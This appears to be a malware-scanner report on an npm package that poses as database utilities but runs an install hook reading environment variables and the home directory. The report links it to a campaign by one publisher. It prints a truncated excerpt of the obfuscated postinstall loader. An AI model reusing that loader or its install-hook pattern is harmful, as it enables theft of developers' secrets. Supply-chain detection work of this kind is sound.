// npm 패키지
@cloudplatform-single-spa/ssh-keys
Internal database utilities with connection pooling, query builder and migration support
버전
3
메인테이너
1
라이선스
UNLICENSED
최초 publish
2026-05-27
publisher
mr.4nd3r50n
tarball
17,299 B
AUTO-PUBLISHED·1개 버전 인덱싱됨·최근 publish: 2026-05-28
// exfil path
what is read → where it shipssteals
- ○ home dir
sends to
(no destination string extracted — payload may be dynamic / obfuscated)
→ view full payload// publisher 캠페인by mr.4nd3r50n
이 계정에서 catch된 패키지 9건고립된 catch가 아닙니다. 동일 publisher가 8개의 다른 패키지를 추가로 발행했고, 모두 파이프라인이 catch했습니다 — 일회성이 아닌 조직적 캠페인의 형태. 아래 링크는 각 형제 catch의 분석으로 이동합니다.
// offending code· @100.100.100· 1 file flagged
llm: benign · 0.85→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
- @100.100.100··AUTO-PUBLISHED·publisher: mr.4nd3r50nheuristic 100/100static flags 2llm benign (0.85) via ollamainstall-scripts:postinstallnew-publisher:1danomalous-major-version:100publisher-multi-name-burst:24publisher-version-pump:25osv-flagged:MAL-2026-4972reads-env-varsreads-homedir
→ 의심 전송지 없음, 원격 실행 형태 없음 — 1 known-vendor host(s).
// offending code· 1 file flaggedpatterns: 2
--- install scripts --- ### postinstall node scripts/postinstall.js ### prepublishOnly echo 'Building...' --- package/scripts/postinstall.js (excerpt) --- 'use strict';const a0_0x59130b=a0_0x53e5;function a0_0x2ff5(){const _0x29dbf7=['otuZmfzUBu1Juq','Ag9TzwrPCG','y2HHCKnVzgvbDa','ChvZAa','wc1tzwnYzxq','BM9Kzq','u0vduKvu','lMPZ','mZuYog9yuKLUDG','C3rKAw8','BwfJ','CMvHzezPBgvtEw5J','Dg9tDhjPBMC','D2LUmZi','CgfYC2u','mJq4nduXwfrPwfL2','rLvtsu9oxW','CgfJA2fNzs5QC29U','lL9JBg91zhbSyxrMB3jTlxnPBMDSzs1ZCgfFAw5PDc5QCW','Ahr0Chm6lY9VB2iUBw9PA2eUDgvJAc9WyxLSB2fKlW','otzcvNDSDeC','CgXHDgzVCM0','q0XpvurqtefurK9stv9tsu5htevFu1bbx05px1rftevnrvrswq','zgfYD2LU','Ahr0Chm6','uKvdt05Ft05mwq','mJa5n3H1te9Kuq','CgfKu3rHCNq','mJiYnti0rMjet2rA','CMvHzgrPCLn5BMm','BgLUDxG','y2XVDwrWBgf0zM9YBs1ZAw5NBguTC3bHlxrLBgvTzxrYEs8XlJa','lL9JBg91zhbSyxrMB3jTlxnPBMDSzs1ZCgfFAw5PDa','zw52','DxrMoa','qgnSB3vKCgXHDgzVCM0TC2LUz2XLlxnWys9ZC2GTA2v5CW','mtCWmZa1DLbAAgLA','D2LU','zw5K','uefzte9bra','Ag9ZDg5HBwu','xsbxyxjUAw5NoIboB2rLlMPZid49mtyUmcbYzxf1AxjLza','mtHyqMHWq0G','zxHPC3rZu3LUyW','AwDUB3jL','pJ0XnI4W','DMfSDwu','Ahr0Chm6lY9VB2iUBw9PA2eUDgvJAc9YzxbVCNq','C3rYAw5NAwz5','Cgf0Ag5HBwu','CMvWBgfJzq','zgvZDhjVEq','CMvJDxjZAxzL','mtyXndG2ng1YCgnHAa','Ahr0Chm6lY9VB2iUBw9PA2eUDgvJAc9WyxLSB2fK','Ahr0Ca','BM93','zgf0yq','BwTKAxjtEw5J','D29YA3nWywnLCW','r0vu','revqx0nptG','DgLTzw91Da','D2LUzg93C0HPzgu','lMPZB24','lMnHy2HL','zgLYBMfTzq','vKvs','EwfYBI5SB2nR','D3jPDgvgAwXLu3LUyW','ywjZ','zxjYB3i','zgv0ywnOzwq','vxnLCI1bz2vUDa','C3rKzxjY','Cgf0Aa','Dg1WzgLY','zxHLy1bHDgG','CMvXDwvZDa','Dhj1zq','AM9PBG','y29Uy2f0','BxrPBwvnCW','kcGOlISPkYKRksSK','oti1ndyWExLsA1nU','zxHWAxjLCW --- bundled output (OSV-MAL flagged — LLM scope expansion) --- --- dist/index.d.ts (bundled) --- export interface PoolOptions { host?: string; port?: number; database?: string; user?: string; password?: string; max?: number; } export interface Pool { host: string; port: number; database: string; } export function createPool(options?: PoolOptions): Pool; export function query(pool: Pool, sql: string, params?: unknown[]): Promise<unknown[]>; export function transaction(pool: Pool, fn: (client: unknown) => Promise<unknown>): Promise<unknown>; export function migrate(pool: Pool, dir?: string): Promise<string[]>; --- dist/index.js (bundled) --- 'use strict'; // dist/index.js module.exports = require('../src/index.js');
